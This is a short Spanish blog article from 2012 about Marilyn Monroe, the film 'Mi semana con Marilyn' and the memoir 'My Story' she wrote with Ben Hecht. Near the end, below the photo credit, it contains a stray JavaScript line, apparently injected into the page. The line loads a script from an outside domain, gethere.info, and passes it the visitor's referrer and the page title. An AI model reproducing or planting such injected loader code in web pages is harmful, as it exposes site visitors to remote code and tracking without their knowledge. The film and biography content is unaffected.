¿Qué fue de Norma Jean?

22/03/2012

Estrellas hay muchas en el mundo del papel couché. Pero no todas son iguales. Algunas pertenecen a un gran montón y otras podrían ser por sí solas ese gran montón. Y estas últimas, las estrellas auténticas y verdaderas, no son tantas… Norma Jean, o si prefieren, Marilyn Monroe, es una. Desde aquel fatídico 5 de agosto de 1962 (día en que fue hallada muerta por una supuesta sobredosis de somníferos, versión que en realidad nunca nadie pudo demostrar) siempre hay alguien interesado en hablar sobre ella. Y así este año Michelle Williams protagoniza Mi semana con Marilyn, película basada en los libros de Colin Clark, donde se habla del rodaje de El príncipe y la corista, largometraje protagonizado por la rubia por excelencia y por Laurence Olivier en 1957 -siendo, éste mismo, su director-.

Sin embargo no solo hablaremos de la Monroe gracias a este filme, sino también gracias al recuperado relato My story, texto biográfico basado en una conversación que mantuvo la diva con Ben Hecht -guionista de algunos grandes clásicos, como Lo que el viento se llevó– en 1954. En aquella época Norma empezaba a hacerse un hueco en el Hollywood del momento gracias a la fama adquirida a raíz de películas como Los caballeros las prefieren rubias o Cómo casarse con un millonario. En esta conversación también salen a relucir sus años más grises, los de su infancia, años más bien desgraciados, con un orfanato de por medio, varias adopciones y una madre depresiva que durante sus primeros siete años de vida no se hizo cargo de su hija.

My Story no solo destaca por el esclarecedor texto biográfico sino también por las geniales fotografías que lo acompañan, siendo el culpable de dichas imagenes Milton H. Greene.

Foto | http://photos/58381630@N02/

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

ARTÍCULOS RELACIONADOS
COMPARTE ESTE ARTÍCULO